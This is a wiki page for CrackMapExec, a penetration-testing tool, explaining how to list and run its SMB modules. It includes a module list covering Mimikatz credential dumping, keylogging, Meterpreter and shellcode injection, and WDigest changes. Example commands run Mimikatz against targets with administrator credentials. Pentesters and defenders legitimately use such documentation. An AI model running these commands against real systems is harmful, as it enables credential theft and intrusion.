This repository has been archived by the owner on Dec 6, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 1.6k
Using Modules
byt3bl33d3r edited this page Apr 26, 2017
·
4 revisions
As of v3.1, the way modules are loaded and used has changed in an effort to make CME more portable and to enable it to be packaged.
With v4.0, each protocol can now have it's own set of modules (fun fun fun!)
Run cme <protocol> -L to view available modules for the specified protocol.
For example to view all modules for the SMB protocol:
#~ cme smb -L
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] get_keystrokes Logs keys pressed, time and the active window
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] mimikatz_enum_chrome Decrypts saved Chrome passwords using Mimikatz
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] get_netrdpsession Enumerates all active RDP sessions
[*] uac Checks UAC status
[*] netripper Capture's credentials by using API hooking
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] multirdp Patches terminal services in memory to allow multiple RDP users
[*] pe_inject Downloads the specified DLL/EXE and injects it into memory
[*] test_connection Pings a host
[*] shellcode_inject Downloads the specified raw shellcode and injects it into memory
[*] tokens Enumerates available tokens
[*] mimikatz Dumps all logon credentials from memory
[*] mimikittenz Executes Mimikittenz
[*] enum_chrome Decrypts saved Chrome passwords using Get-ChromeDump
[*] wdigest Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1
[*] invoke_vnc Injects a VNC client in memory
[*] mimikatz_enum_vault_creds Decrypts saved credentials in Windows Vault/Credential Manager
[*] get_netdomaincontroller Enumerates all domain controllers
[*] get_timedscreenshot Takes screenshots at a regular interval
Run cme <protocol> <target(s)> -M <module name>.
For example to run the SMB Mimikatz module:
#~ crackmapexec smb <target(s)> -u Administrator -p 'P@ssw0rd' -M mimikatz
Run cme <protocol> -M <module name> --options to view a modules supported options, e.g:
#~ cme smb -M mimikatz --options
Module options are specified with the -o flag. All options are specified in the form of KEY=value (msfvenom style)
Example:
#~ cme <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M mimikatz -o COMMAND='privilege::debug'